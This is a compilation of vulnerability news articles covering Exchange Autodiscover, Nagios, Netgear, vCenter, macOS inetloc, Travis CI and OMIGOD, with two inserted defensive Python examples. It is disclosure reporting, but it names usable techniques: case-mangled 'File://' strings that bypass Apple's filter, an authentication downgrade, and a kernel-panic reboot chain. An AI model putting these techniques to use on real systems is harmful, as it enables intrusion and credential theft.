Lastly, CVE-2021-1619 relates to an "uninitialized variable" in the authentication, authorization, and accounting (AAA) function of Cisco IOS XE Software that could permit an authenticated, remote adversary to "install, manipulate, or delete the configuration of a network device or to corrupt memory on the device, resulting in a DoS."

Also addressed by Cisco are 15 high-severity vulnerabilities and 15 medium-severity flaws affecting different components of the IOS XE software as well as Cisco Access Points platform and Cisco SD-WAN vManage Software. Users and administrators are recommended to apply the necessary updates to mitigate any potential exploitation risk by malicious actors.


Microsoft Exchange Bug Exposes ~100,000 Windows Domain Credentials
6.10.21 
Vulnerebility  Thehackernews
An unpatched design flaw in the implementation of Microsoft Exchange's Autodiscover protocol has resulted in the leak of approximately 100,000 login names and passwords for Windows domains worldwide.

"This is a severe security issue, since if an attacker can control such domains or has the ability to 'sniff' traffic in the same network, they can capture domain credentials in plain text (HTTP basic authentication) that are being transferred over the wire," Guardicore's Amit Serper said in a technical report.

"Moreover, if the attacker has DNS-poisoning capabilities on a large scale (such as a nation-state attacker), they could systematically syphon out leaky passwords through a large-scale DNS poisoning campaign based on these Autodiscover TLDs [top-level domains]."

The Exchange Autodiscover service enables users to configure applications such as Microsoft Outlook with minimal user input, allowing just a combination of email addresses and passwords to be utilized to retrieve other predefined settings required to set up their email clients.

The weakness discovered by Guardicore resides in a specific implementation of Autodiscover based on the POX (aka "plain old XML") XML protocol that causes the web requests to Autodiscover domains to be leaked outside of the user's domain but in the same top-level domain.

In a hypothetical example where a user's email address is "user@example.com," the email client leverages the Autodiscover service to construct a URL to fetch the configuration data using any of the below combinations of the email domain, a subdomain, and a path string, failing which it instantiates a "back-off" algorithm —

https://Autodiscover.example.com/Autodiscover/Autodiscover.xml
https://example.com/Autodiscover/Autodiscover.xml
"This 'back-off' mechanism is the culprit of this leak because it is always trying to resolve the Autodiscover portion of the domain and it will always try to 'fail up,' so to speak," Serper explained. "Meaning, the result of the next attempt to build an Autodiscover URL would be: 'https://Autodiscover.com/Autodiscover/Autodiscover.xml.' This means that whoever owns Autodiscover.com will receive all of the requests that cannot reach the original domain."

Armed with this discovery and by registering a number of Autodiscover top-level domains (e.g., Autodiscover.com[.]br, Autodiscover.com[.]cn, Autodiscover[.]in, etc.) as honeypots, Guardicore said it was able to access requests to Autodiscover endpoints from different domains, IP addresses, and clients, netting 96,671 unique credentials sent from Outlook, mobile email clients, and other applications interfacing with Microsoft's Exchange server over a four-month period between April 16, 2021, and August 25, 2021.

The domains of those leaked credentials belonged to several entities from multiple verticals spanning publicly traded corporations in China, investment banks, food manufacturers, power plants, and real estate firms, the Boston-based cybersecurity company noted.

To make matters worse, the researchers developed an "ol' switcheroo" attack that involved sending a request to the client to downgrade to a weaker authentication scheme (i.e., HTTP Basic authentication) in place of secure methods like OAuth or NTLM, prompting the email application to send the domain credentials in cleartext.

To mitigate Autodiscover leaks, it's recommended that Exchange users disable support for basic authentication and add a list of all possible Autodiscover.TLD domains to a local hosts file or firewall configuration to prevent unwanted Autodiscover domain resolution. Software vendors are also advised to avoid implementing a "back-off" procedure that fails upwards to construct unforeseen domains like "Autodiscover."
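The back-off described above and the hosts-file mitigation, as an added example that is not Guardicore's or Microsoft's code. It models the first-stage candidates, the flawed "fail up" that ends at Autodiscover.<TLD>, a hardened variant that never leaves the user's domain, and the hosts(5) block list; the assumption is that the back-off strips one leading label per retry, since the article only names its end point.

```python
"""Added example, not Guardicore's or Microsoft's code: the POX Autodiscover
URL construction, the flawed 'fail up' back-off, a hardened variant and the
hosts-file mitigation. Assumption: one leading label is dropped per retry."""
from typing import List

AUTODISCOVER_PATH = "/Autodiscover/Autodiscover.xml"


def first_stage_hosts(email_domain: str) -> List[str]:
    """Hosts tried before any back-off: Autodiscover.<domain> and <domain>."""
    return [f"Autodiscover.{email_domain}", email_domain]


def flawed_backoff_hosts(email_domain: str) -> List[str]:
    """Flawed client: on failure drop the leftmost label and retry
    Autodiscover.<remaining labels> until only the TLD is left, so
    user@example.com ends up asking Autodiscover.com."""
    hosts = first_stage_hosts(email_domain)
    labels = email_domain.split(".")
    while len(labels) > 1:
        labels = labels[1:]
        hosts.append("Autodiscover." + ".".join(labels))
    return hosts


def hardened_hosts(email_domain: str) -> List[str]:
    """Hardened client: candidates stay inside the user's own domain;
    if none answers, give up instead of failing upwards."""
    return first_stage_hosts(email_domain)


def outside_user_domain(email_domain: str, hosts: List[str]) -> List[str]:
    """Hosts that are neither the user's domain nor a subdomain of it,
    i.e. every request that would reach a third party."""
    dom = email_domain.lower()
    return [h for h in hosts
            if h.lower() != dom and not h.lower().endswith("." + dom)]


def candidate_urls(hosts: List[str]) -> List[str]:
    """The URLs a client would actually request for the given hosts."""
    return [f"https://{h}{AUTODISCOVER_PATH}" for h in hosts]


def hosts_file_block_entries(tlds: List[str]) -> List[str]:
    """hosts(5) lines that sink Autodiscover.<TLD> lookups, as the mitigation
    paragraph suggests. The TLD list is the caller's; the ones used in the
    demo below are constructed from the honeypots named in the article."""
    return [f"0.0.0.0 Autodiscover.{tld.lower()}" for tld in tlds]


if __name__ == "__main__":
    for domain in ("example.com", "example.com.br"):
        flawed = flawed_backoff_hosts(domain)
        print(domain, "flawed ->", candidate_urls(flawed))
        print("  leaks to:", outside_user_domain(domain, flawed))
        print("  hardened leaks to:",
              outside_user_domain(domain, hardened_hosts(domain)))
    print("\n".join(hosts_file_block_entries(["com", "com.br", "in"])))
```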

"Oftentimes, attackers will try to cause users to send them their credentials by applying various techniques, whether technical or through social engineering," Serper said. "However, this incident shows us that passwords can be leaked outside of the organization's perimeter by a protocol that was meant to streamline the IT department's operations with regards to email client configuration without anyone from the IT or security department even being aware of it, which emphasises the importance of proper segmentation and Zero Trust."


A New Bug in Microsoft Windows Could Let Hackers Easily Install a Rootkit
6.10.21 
Vulnerebility  Thehackernews
Security researchers have disclosed an unpatched weakness in Microsoft Windows Platform Binary Table (WPBT) affecting all Windows-based devices since Windows 8 that could be potentially exploited to install a rootkit and compromise the integrity of devices.

"These flaws make every Windows system vulnerable to easily-crafted attacks that install fraudulent vendor-specific tables," researchers from Eclypsium said in a report published on Monday. "These tables can be exploited by attackers with direct physical access, with remote access, or through manufacturer supply chains. More importantly, these motherboard-level flaws can obviate initiatives like Secured-core because of the ubiquitous usage of ACPI [Advanced Configuration and Power Interface] and WPBT."

WPBT, introduced with Windows 8 in 2012, is a feature that enables "boot firmware to provide Windows with a platform binary that the operating system can execute."

In other words, it allows PC manufacturers to point to signed portable executables or other vendor-specific drivers that come as part of the UEFI firmware ROM image in such a manner that it can be loaded into physical memory during Windows initialization and prior to executing any operating system code.

The main objective of WPBT is to allow critical features such as anti-theft software to persist even in scenarios where the operating system has been modified, formatted, or reinstalled. But given the functionality's ability to have such software "stick to the device indefinitely," Microsoft has warned of potential security risks that could arise from misuse of WPBT, including the possibility of deploying rootkits on Windows machines.

"Because this feature provides the ability to persistently execute system software in the context of Windows, it becomes critical that WPBT-based solutions are as secure as possible and do not expose Windows users to exploitable conditions," the Windows maker notes in its documentation. "In particular, WPBT solutions must not include malware (i.e., malicious software or unwanted software installed without adequate user consent)."

The vulnerability uncovered by the enterprise firmware security company is rooted in the fact that the WPBT mechanism can accept a signed binary with a revoked or an expired certificate to completely bypass the integrity check, thus permitting an attacker to sign a malicious binary with an already available expired certificate and run arbitrary code with kernel privileges when the device boots up.

In response to the findings, Microsoft has recommended using a Windows Defender Application Control (WDAC) policy to tightly restrict what binaries can be permitted to run on the devices.

The latest disclosure follows a separate set of findings in June 2021, which involved a clutch of four vulnerabilities — collectively called BIOS Disconnect — that could be weaponized to gain remote execution within the firmware of a device during a BIOS update, further highlighting the complexity and challenges involved in securing the boot process.

"This weakness can be potentially exploited via multiple vectors (e.g., physical access, remote, and supply chain) and by multiple techniques (e.g., malicious bootloader, DMA, etc)," the researchers said. "Organizations will need to consider these vectors, and employ a layered approach to security to ensure that all available fixes are applied and identify any potential compromises to devices."


New Nagios Software Bugs Could Let Hackers Take Over IT Infrastructures
6.10.21 
Vulnerebility  Thehackernews
As many as 11 security vulnerabilities have been disclosed in Nagios network management systems, some of which could be chained to achieve pre-authenticated remote code execution with the highest privileges, as well as lead to credential theft and phishing attacks.

Industrial cybersecurity firm Claroty, which discovered the flaws, said tools such as Nagios make an attractive target owing to their "oversight of core servers, devices, and other critical components in the enterprise network." The issues have since been fixed in updates released in August with Nagios XI 5.8.5 or above, Nagios XI Switch Wizard 2.5.7 or above, Nagios XI Docker Wizard 1.13 or above, and Nagios XI WatchGuard 1.4.8 or above.

"SolarWinds and Kaseya were likely targeted not only because of their large and influential customer bases, but also because of their respective technologies' access to enterprise networks, whether it was managing IT, operational technology (OT), or internet of things (IoT) devices," Claroty's Noam Moshe said in a write-up published Tuesday, noting how the intrusions targeting the IT and network management supply chains emerged as a conduit to compromise thousands of downstream victims.

Nagios Core is a popular open-source network health tool analogous to SolarWinds Network Performance Monitor (NPM) that's used for keeping tabs on IT infrastructure for performance issues and sending alerts following the failure of mission-critical components. Nagios XI, a proprietary web-based platform built atop Nagios Core, provides organizations with extended insight into their IT operations with scalable monitoring and a customizable high-level overview of hosts, services, and network devices.

Chief among the issues are two remote code execution flaws (CVE-2021-37344, CVE-2021-37346) in Nagios XI Switch Wizard and Nagios XI WatchGuard Wizard, an SQL injection vulnerability (CVE-2021-37350) in Nagios XI, and a server-side request forgery (SSRF) affecting Nagios XI Docker Wizard, as well as a post-authenticated RCE in Nagios XI's AutoDiscovery tool (CVE-2021-37343). The complete list of 11 flaws is as follows -

CVE-2021-37343 (CVSS score: 8.8) - A path traversal vulnerability exists in Nagios XI below version 5.8.5 AutoDiscovery component and could lead to post-authenticated RCE under the security context of the user running Nagios.
CVE-2021-37344 (CVSS score: 9.8) - Nagios XI Switch Wizard before version 2.5.7 is vulnerable to remote code execution through improper neutralization of special elements used in an OS Command (OS Command injection).
CVE-2021-37345 (CVSS score: 7.8) - Nagios XI before version 5.8.5 is vulnerable to local privilege escalation because xi-sys.cfg is being imported from the var directory for some scripts with elevated permissions.
CVE-2021-37346 (CVSS score: 9.8) - Nagios XI WatchGuard Wizard before version 1.4.8 is vulnerable to remote code execution through Improper neutralization of special elements used in an OS Command (OS Command injection).
CVE-2021-37347 (CVSS score: 7.8) - Nagios XI before version 5.8.5 is vulnerable to local privilege escalation because getprofile.sh does not validate the directory name it receives as an argument.
CVE-2021-37348 (CVSS score: 7.5) - Nagios XI before version 5.8.5 is vulnerable to local file inclusion through an improper limitation of a pathname in index.php.
CVE-2021-37349 (CVSS score: 7.8) - Nagios XI before version 5.8.5 is vulnerable to local privilege escalation because cleaner.php does not sanitize input read from the database.
CVE-2021-37350 (CVSS score: 9.8) - Nagios XI before version 5.8.5 is vulnerable to SQL injection vulnerability in Bulk Modifications Tool due to improper input sanitization.
CVE-2021-37351 (CVSS score: 5.3) - Nagios XI before version 5.8.5 is vulnerable to insecure permissions and allows unauthenticated users to access guarded pages through a crafted HTTP request to the server.
CVE-2021-37352 (CVSS score: 6.1) - An open redirect vulnerability exists in Nagios XI before version 5.8.5 that could lead to spoofing. To exploit the vulnerability, an attacker could send a link that has a specially-crafted URL and convince the user to click the link.
CVE-2021-37353 (CVSS score: 9.8) - Nagios XI Docker Wizard before version 1.1.3 is vulnerable to SSRF due to improper sanitization in table_population.php
In a nutshell, the flaws could be combined by attackers to drop a web shell or execute PHP scripts and elevate their privileges to root, thus achieving arbitrary command execution in the context of the root user. As a proof-of-concept, Claroty chained CVE-2021-37343 and CVE-2021-37347 to gain a write-what-where primitive, allowing an attacker to write content to any file in the system.

"[Network management systems] require extensive trust and access to network components in order to properly monitor network behaviors and performance for failures and poor efficiency," Moshe said.

"They may also extend outside your network through the firewall to attend to remote servers and connections. Therefore, these centralized systems can be a tasty target for attackers who can leverage this type of network hub, and attempt to compromise it in order to access, manipulate, and disrupt other systems."

The disclosure is the second time nearly a dozen vulnerabilities have been disclosed in Nagios since the start of the year. Earlier this May, Skylight Cyber revealed 13 security weaknesses in the network monitoring application that could be abused by an adversary to hijack the infrastructure without any operator intervention.


High-Severity RCE Flaw Disclosed in Several Netgear Router Models
6.10.21 
Vulnerebility  Thehackernews

Networking equipment company Netgear has released patches to remediate a high-severity remote code execution vulnerability affecting multiple routers that could be exploited by remote attackers to take control of an affected system.

Traced as CVE-2021-40847 (CVSS score: 8.1), the security weakness impacts the following models -

R6400v2 (fixed in firmware version 1.0.4.120)
R6700 (fixed in firmware version 1.0.2.26)
R6700v3 (fixed in firmware version 1.0.4.120)
R6900 (fixed in firmware version 1.0.2.26)
R6900P (fixed in firmware version 3.3.142_HOTFIX)
R7000 (fixed in firmware version 1.0.11.128)
R7000P (fixed in firmware version 1.3.3.142_HOTFIX)
R7850 (fixed in firmware version 1.0.5.76)
R7900 (fixed in firmware version 1.0.4.46)
R8000 (fixed in firmware version 1.0.4.76)
RS400 (fixed in firmware version 1.5.1.80)
According to GRIMM security researcher Adam Nichols, the vulnerability resides within Circle, a third-party component included in the firmware that offers parental control features in Netgear devices. Particularly, the issue concerns the Circle update daemon, which is enabled to run by default even if the router hasn't been configured to limit daily internet time for websites and apps, resulting in a scenario that could permit bad actors with network access to gain remote code execution (RCE) as root via a Man-in-the-Middle (MitM) attack.

This is made possible owing to the manner in which the update daemon (called "circled") connects to Circle and Netgear to fetch updates to the filtering database — which are both unsigned and downloaded using HTTP — thereby making it possible for an interloper to stage an MitM attack and respond to the update request with a specially-crafted compressed database file, extracting which gives the attacker the ability to overwrite executable binaries with malicious code.

"Since this code is run as root on the affected routers, exploiting it to obtain RCE is just as damaging as a RCE vulnerability found in the core Netgear firmware," Nichols said. "This particular vulnerability once again demonstrates the importance of attack surface reduction."

The disclosure comes weeks after Google security engineer Gynvael Coldwind revealed details of three severe security vulnerabilities dubbed Demon's Cries, Draconian Fear, and Seventh Inferno, impacting over a dozen of its smart switches, allowing threat actors to bypass authentication and gain full control of vulnerable devices.

UPDATE: Following the publication of the story, Circle shared the below statement with The Hacker News —

"Circle created software fixes to resolve recently publicized security vulnerabilities for a loader on Netgear routers and has worked with Netgear to ensure that it is available for Netgear customers. Circle recommends that Netgear users ensure that they are using the latest firmware for their Netgear routers. No other Circle customers are impacted by this vulnerability."


VMware Warns of Critical File Upload Vulnerability Affecting vCenter Server
6.10.21 
Vulnerebility   Thehackernews
VMware on Tuesday published a new bulletin warning of as many as 19 vulnerabilities in vCenter Server and Cloud Foundation appliances that a remote attacker could exploit to take control of an affected system.

The most urgent among them is an arbitrary file upload vulnerability in the Analytics service (CVE-2021-22005) that impacts vCenter Server 6.7 and 7.0 deployments. "A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file," the company noted, adding "this vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server."

Although VMware has published workarounds for the flaw, the company cautioned that they are "meant to be a temporary solution until updates […] can be deployed."

The complete list of flaws patched by the virtualization services provider is as follows —

CVE-2021-22005 (CVSS score: 9.8) - vCenter Server file upload vulnerability
CVE-2021-21991 (CVSS score: 8.8) - vCenter Server local privilege escalation vulnerability
CVE-2021-22006 (CVSS score: 8.3) - vCenter Server reverse proxy bypass vulnerability
CVE-2021-22011 (CVSS score: 8.1) - vCenter server unauthenticated API endpoint vulnerability
CVE-2021-22015 (CVSS score: 7.8) - vCenter Server improper permission local privilege escalation vulnerabilities
CVE-2021-22012 (CVSS score: 7.5) - vCenter Server unauthenticated API information disclosure vulnerability
CVE-2021-22013 (CVSS score: 7.5) - vCenter Server file path traversal vulnerability
CVE-2021-22016 (CVSS score: 7.5) - vCenter Server reflected XSS vulnerability
CVE-2021-22017 (CVSS score: 7.3) - vCenter Server rhttpproxy bypass vulnerability
CVE-2021-22014 (CVSS score: 7.2) - vCenter Server authenticated code execution vulnerability
CVE-2021-22018 (CVSS score: 6.5) - vCenter Server file deletion vulnerability
CVE-2021-21992 (CVSS score: 6.5) - vCenter Server XML parsing denial-of-service vulnerability
CVE-2021-22007 (CVSS score: 5.5) - vCenter Server local information disclosure vulnerability
CVE-2021-22019 (CVSS score: 5.3) - vCenter Server denial of service vulnerability
CVE-2021-22009 (CVSS score: 5.3) - vCenter Server VAPI multiple denial of service vulnerabilities
CVE-2021-22010 (CVSS score: 5.3) - vCenter Server VPXD denial of service vulnerability
CVE-2021-22008 (CVSS score: 5.3) - vCenter Server information disclosure vulnerability
CVE-2021-22020 (CVSS score: 5.0) - vCenter Server Analytics service denial-of-service vulnerability
CVE-2021-21993 (CVSS score: 4.3) - vCenter Server SSRF vulnerability
Credited with reporting most of the flaws are George Noseevich and Sergey Gerasimov of SolidLab LLC, alongside Hynek Petrak of Schneider Electric, Yuval Lazar of Pentera, and Osama Alaa of Malcrove.

"The ramifications of [CVE-2021-22005] are serious and it is a matter of time – likely minutes after the disclosure – before working exploits are publicly available," VMware said in an FAQ urging customers to immediately update their vCenter installations.

"With the threat of ransomware looming nowadays the safest stance is to assume that an attacker may already have control of a desktop and a user account through the use of techniques like phishing or spear-phishing, and act accordingly. This means the attacker may already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence," the company added.


Unpatched High-Severity Vulnerability Affects Apple macOS Computers
6.10.21 
Vulnerebility  Thehackernews

Cybersecurity researchers on Tuesday disclosed details of an unpatched zero-day vulnerability in macOS Finder that could be abused by remote adversaries to trick users into running arbitrary commands on the machines.

"A vulnerability in macOS Finder allows files whose extension is inetloc to execute arbitrary commands, these files can be embedded inside emails which if the user clicks on them will execute the commands embedded inside them without providing a prompt or warning to the user," SSD Secure Disclosure said in a write-up published today.

Park Minchan, an independent security researcher, has been credited with reporting the vulnerability which affects macOS versions of Big Sur and prior.

The weakness arises due to the manner macOS processes INETLOC files — shortcuts to open internet locations such as RSS feeds, Telnet connections, or other online resources and local files — resulting in a scenario that allows commands embedded in those files to be executed without any warning.

"The case here INETLOC is referring to a 'file://' protocol which allows running locally (on the user's computer) stored files," SSD said. "If the INETLOC file is attached to an email, clicking on the attachment will trigger the vulnerability without warning."

Although newer versions of macOS have blocked the 'file://' prefix, the flaw can still be exploited by simply changing the protocol to 'File://' or 'fIle://' to effectively circumvent the check. We have reached out to Apple, and we will update the story if we hear back.

"Newer versions of macOS (from Big Sur) have blocked the 'file://' prefix (in the com.apple.generic-internet-location) however they did a case matching causing 'File://' or 'fIle://' to bypass the check," the advisory said. "We have notified Apple that 'FiLe://' (just mangling the value) doesn't appear to be blocked, but have not received any response from them since the report has been made. As far as we know, at the moment, the vulnerability has not been patched."
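The case-matching mistake described above, as an added example that is not Apple's code: a flawed check that refuses only the literal lowercase "file://" prefix sits next to a hardened check that parses and normalises the scheme and admits only an allow-list, so "File://", "fIle://" and "FiLe://" are all refused. The .inetloc plist layout (a single URL key) and the allowed-scheme set are assumptions for the example.

```python
"""Added example, not Apple's code: the flawed case-sensitive 'file://' check
beside a hardened, allow-list scheme check. The .inetloc layout (a plist with
one 'URL' key) and the allowed schemes are assumptions for this example."""
import plistlib
from urllib.parse import urlsplit

# Schemes an internet-location shortcut is expected to open (assumed allow-list).
ALLOWED_SCHEMES = frozenset({"http", "https", "ftp", "feed", "telnet", "ssh"})


def build_inetloc(url: str) -> bytes:
    """Constructed sample .inetloc body: a binary plist with a single URL key."""
    return plistlib.dumps({"URL": url}, fmt=plistlib.FMT_BINARY)


def url_from_inetloc(data: bytes) -> str:
    """Read the target URL back out of an .inetloc body."""
    return str(plistlib.loads(data)["URL"])


def flawed_is_blocked(url: str) -> bool:
    """The behaviour the advisory describes: only an exact, lowercase prefix
    is refused, so any change of case in the scheme slips through."""
    return url.startswith("file://")


def hardened_is_blocked(url: str) -> bool:
    """Parse the scheme (RFC 3986 schemes are case-insensitive), lower-case
    it, and refuse anything not explicitly allowed. A missing or unparseable
    scheme is refused as well rather than guessed at."""
    scheme = urlsplit(url.strip()).scheme.lower()
    return scheme not in ALLOWED_SCHEMES


def inetloc_is_blocked(data: bytes, check=hardened_is_blocked) -> bool:
    """Apply a scheme check to the URL carried inside an .inetloc body."""
    return check(url_from_inetloc(data))


if __name__ == "__main__":
    samples = ["file:///path/to/local/file", "File:///path/to/local/file",
               "fIle:///path/to/local/file", "FiLe:///path/to/local/file",
               "https://example.com/feed.xml"]
    for u in samples:
        print(f"{u:32} flawed blocks={flawed_is_blocked(u)!s:5} "
              f"hardened blocks={hardened_is_blocked(u)}")
```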


Travis CI Flaw Exposes Secrets of Thousands of Open Source Projects
19.9.21 
Vulnerebility  Thehackernews
Continuous integration vendor Travis CI has patched a serious security flaw that exposed API keys, access tokens, and credentials, potentially putting organizations that use public source code repositories at risk of further attacks.

The issue — tracked as CVE-2021-41077 — concerns unauthorized access and plunder of secret environment data associated with a public open-source project during the software build process. The problem is said to have lasted during an eight-day window between September 3 and September 10.

Felix Lange of Ethereum has been credited with discovering the leakage on September 7, with the company's Péter Szilágyi pointing out that "anyone could exfiltrate these and gain lateral movement into 1000s of [organizations]."

Travis CI is a hosted CI/CD (short for continuous integration and continuous deployment) solution used to build and test software projects hosted on source code repository systems like GitHub and Bitbucket.

"The desired behavior (if .travis.yml has been created locally by a customer, and added to git) is for a Travis service to perform builds in a way that prevents public access to customer-specific secret environment data such as signing keys, access credentials, and API tokens," the vulnerability description reads. "However, during the stated 8-day interval, secret data could be revealed to an unauthorized actor who forked a public repository and printed files during a build process."

In other words, a public repository forked from another one could file a pull request that could obtain secret environmental variables set in the original upstream repository. Travis CI, in its own documentation, notes that "Encrypted environment variables are not available to pull requests from forks due to the security risk of exposing such information to unknown code."

It has also acknowledged the risk of exposure stemming from an external pull request: "A pull request sent from a fork of the upstream repository could be manipulated to expose environment variables. The upstream repository's maintainer would have no protection against this attack, as pull requests can be sent by anyone who forks the repository on GitHub."

Szilágyi also called out Travis CI for downplaying the incident and failing to admit the "gravity" of the issue, while also urging GitHub to ban the company over its poor security posture and vulnerability disclosure processes. "After three days of pressure from multiple projects, [Travis CI] silently patched the issue on the 10th," Szilágyi tweeted. "No analysis, no security report, no post mortem, not warning any of their users that their secrets might have been stolen."

The Berlin-based DevOps platform company on September 13 published a terse "security bulletin," advising users to rotate their keys on a regular basis, and followed it up with a second notice on its community forums stating that it has found no evidence the bug was exploited by malicious parties.

"Due to the extremely irresponsible way [Travis CI] handled this situation, and their subsequent refusal to warn their users about potentially leaked secrets, we can only recommend everyone to immediately and indefinitely transfer away from Travis," Szilágyi added.


Third Critical Bug Affects Netgear Smart Switches — Details and PoC Released
19.9.21 
Vulnerebility  Thehackernews
New details have been revealed about a recently remediated critical vulnerability in Netgear smart switches that could be leveraged by an attacker to potentially execute malicious code and take control of vulnerable devices.

The flaw — dubbed "Seventh Inferno" (CVSS score: 9.8) — is the third of a trio of security weaknesses, the other two being Demon's Cries (CVSS score: 9.8) and Draconian Fear (CVSS score: 7.8), that Google security engineer Gynvael Coldwind reported to the networking, storage, and security solutions provider.

The disclosure comes weeks after Netgear released patches to address the vulnerabilities earlier this month, on September 3.

Successful exploitation of Demon's Cries and Draconian Fear could grant a malicious party the ability to change the administrator password without actually having to know the previous password or hijack the session bootstrapping information, resulting in a full compromise of the device.

Now, in a new post sharing technical specifics about Seventh Inferno, Coldwind noted that the issue relates to a newline injection flaw in the password field during Web UI authentication, effectively enabling the attacker to create fake session files, and combine it with a reboot Denial of Service (DoS) and a post-authentication shell injection to get a fully valid session and execute any code as root user, thereby leading to full device compromise.

The reboot DoS is a technique designed to reboot the switch by exploiting the newline injection to write "2" into three different kernel configurations — "/proc/sys/vm/panic_on_oom," "/proc/sys/kernel/panic," and "/proc/sys/kernel/panic_on_oops" — in a manner that causes the device to compulsorily shut down and restart due to kernel panic when all the available RAM is consumed upon uploading a large file over HTTP.

"This vulnerability and exploit chain is actually quite interesting technically," Coldwind said. "In short, it goes from a newline injection in the password field, through being able to write a file with constant uncontrolled content of '2' (like, one byte 32h), through a DoS and session crafting (which yields an admin web UI user), to an eventual post-auth shell injection (which yields full root)."

The full list of models impacted by the three vulnerabilities is below —

GC108P (fixed in firmware version 1.0.8.2)
GC108PP (fixed in firmware version 1.0.8.2)
GS108Tv3 (fixed in firmware version 7.0.7.2)
GS110TPP (fixed in firmware version 7.0.7.2)
GS110TPv3 (fixed in firmware version 7.0.7.2)
GS110TUP (fixed in firmware version 1.0.5.3)
GS308T (fixed in firmware version 1.0.3.2)
GS310TP (fixed in firmware version 1.0.3.2)
GS710TUP (fixed in firmware version 1.0.5.3)
GS716TP (fixed in firmware version 1.0.4.2)
GS716TPP (fixed in firmware version 1.0.4.2)
GS724TPP (fixed in firmware version 2.0.6.3)
GS724TPv2 (fixed in firmware version 2.0.6.3)
GS728TPPv2 (fixed in firmware version 6.0.8.2)
GS728TPv2 (fixed in firmware version 6.0.8.2)
GS750E (fixed in firmware version 1.0.1.10)
GS752TPP (fixed in firmware version 6.0.8.2)
GS752TPv2 (fixed in firmware version 6.0.8.2)
MS510TXM (fixed in firmware version 1.0.4.2)
MS510TXUP (fixed in firmware version 1.0.4.2)


Critical Flaws Discovered in Azure App That Microsoft Secretly Installs on Linux VMs
19.9.21 
Vulnerebility  Thehackernews
Microsoft on Tuesday addressed a quartet of security flaws as part of its Patch Tuesday updates that could be abused by adversaries to target Azure cloud customers and elevate privileges as well as allow for remote takeover of vulnerable systems.

The list of flaws, collectively called OMIGOD by researchers from Wiz, affect a little-known software agent called Open Management Infrastructure that's automatically deployed in many Azure services -

CVE-2021-38647 (CVSS score: 9.8) - Open Management Infrastructure Remote Code Execution Vulnerability
CVE-2021-38648 (CVSS score: 7.8) - Open Management Infrastructure Elevation of Privilege Vulnerability
CVE-2021-38645 (CVSS score: 7.8) - Open Management Infrastructure Elevation of Privilege Vulnerability
CVE-2021-38649 (CVSS score: 7.0) - Open Management Infrastructure Elevation of Privilege Vulnerability
Open Management Infrastructure (OMI) is an open-source equivalent of Windows Management Infrastructure (WMI) designed for Linux and UNIX systems such as CentOS, Debian, Oracle Linux, Red Hat Enterprise Linux Server, SUSE Linux, and Ubuntu that allows for monitoring, inventory management, and syncing configurations across IT environments.

Azure customers on Linux machines, including users of Azure Automation, Azure Automatic Update, Azure Operations Management Suite (OMS), Azure Log Analytics, Azure Configuration Management, and Azure Diagnostics, are at risk of potential exploitation.

"When users enable any of these popular services, OMI is silently installed on their virtual machine, running at the highest privileges possible," Wiz security researcher Nir Ohfeld said. "This happens without customers' explicit consent or knowledge. Users simply click agree to log collection during set-up and they have unknowingly opted in."

"In addition to Azure cloud customers, other Microsoft customers are affected since OMI can be independently installed on any Linux machine and is frequently used on-premise," Ohfeld added.

Since the OMI agent runs as root with the highest privileges, the aforementioned vulnerabilities could be abused by external actors or low-privileged users to remotely execute code on target machines and escalate privileges, thereby enabling the threat actors to take advantage of the elevated permissions to mount sophisticated attacks.

The most critical of the four flaws is a remote code execution flaw arising out of an internet-exposed HTTPS port like 5986, 5985, or 1270, allowing attackers to obtain initial access to a target Azure environment and subsequently move laterally within the network.

"This is a textbook RCE vulnerability that you would expect to see in the 90's – it's highly unusual to have one crop up in 2021 that can expose millions of endpoints," Ohfeld said. "With a single packet, an attacker can become root on a remote machine by simply removing the authentication header. It's that simple."

"OMI is just one example of a 'secret' software agent that's pre-installed and silently deployed in cloud environments. It's important to note that these agents exist not just in Azure but in [Amazon Web Services] and [Google Cloud Platform] as well."

Update: Microsoft on Thursday published additional guidance for the OMIGOD vulnerabilities, urging customers to apply the updates manually as and when they become available per the schedule outlined here. The security issues impact all versions of OMI below 1.6.8-1.

"Several Azure Virtual Machine (VM) management extensions use [the OMI] framework to orchestrate configuration management and log collection on Linux VMs," Microsoft Security Response Center said in a bulletin. "The remote code execution vulnerability only impacts customers using a Linux management solution (on-premises SCOM or Azure Automation State Configuration or Azure Desired State Configuration extension) that enables remote OMI management."

The development comes as Bad Packets reported mass scanning of Azure Linux-based servers vulnerable to the remote code execution flaw in an attempt to hijack vulnerable systems and mount further attacks, which, in turn, have been fueled by the public release of a proof-of-concept (PoC) exploit.


Microsoft Releases Patch for Actively Exploited Windows Zero-Day Vulnerability
19.9.21 
Vulnerebility  Thehackernews

A day after Apple and Google rolled out urgent security updates, Microsoft has pushed software fixes as part of its monthly Patch Tuesday release cycle to plug 66 security holes affecting Windows and other components such as Azure, Office, BitLocker, and Visual Studio, including an actively exploited zero-day in its MSHTML Platform that came to light last week.

Of the 66 flaws, three are rated Critical, 62 are rated Important, and one is rated Moderate in severity. This is aside from the 20 vulnerabilities in the Chromium-based Microsoft Edge browser that the company addressed since the start of the month.

The most important of the updates concerns a patch for CVE-2021-40444 (CVSS score: 8.8), an actively exploited remote code execution vulnerability in MSHTML that leverages malware-laced Microsoft Office documents, with EXPMON researchers noting "the exploit uses logical flaws so the exploitation is perfectly reliable."

Also addressed is a publicly disclosed, but not actively exploited, zero-day flaw in Windows DNS. Designated as CVE-2021-36968, the elevation of privilege vulnerability is rated 7.8 in severity.

Other flaws of note resolved by Microsoft involve a number of remote code execution bugs in Open Management Infrastructure (CVE-2021-38647), Windows WLAN AutoConfig Service (CVE-2021-36965), Office (CVE-2021-38659), Visual Studio (CVE-2021-36952), and Word (CVE-2021-38656), as well as a memory corruption flaw in Windows Scripting Engine (CVE-2021-26435).

What's more, the Windows maker has rectified three privilege escalation flaws newly uncovered in its Print Spooler service (CVE-2021-38667, CVE-2021-38671, and CVE-2021-40447), while CVE-2021-36975 and CVE-2021-38639 (CVSS scores: 7.8), both elevation of privilege vulnerabilities in Win32k, are listed as 'exploitation more likely,' making it imperative that users move quickly to apply the security updates.

Software Patches From Other Vendors
Besides Microsoft, patches have also been released by a number of other vendors to address several vulnerabilities, including -

Adobe
Android
Apple
Cisco
Citrix
Linux distributions Oracle Linux, Red Hat, and SUSE
SAP
Schneider Electric, and
Siemens


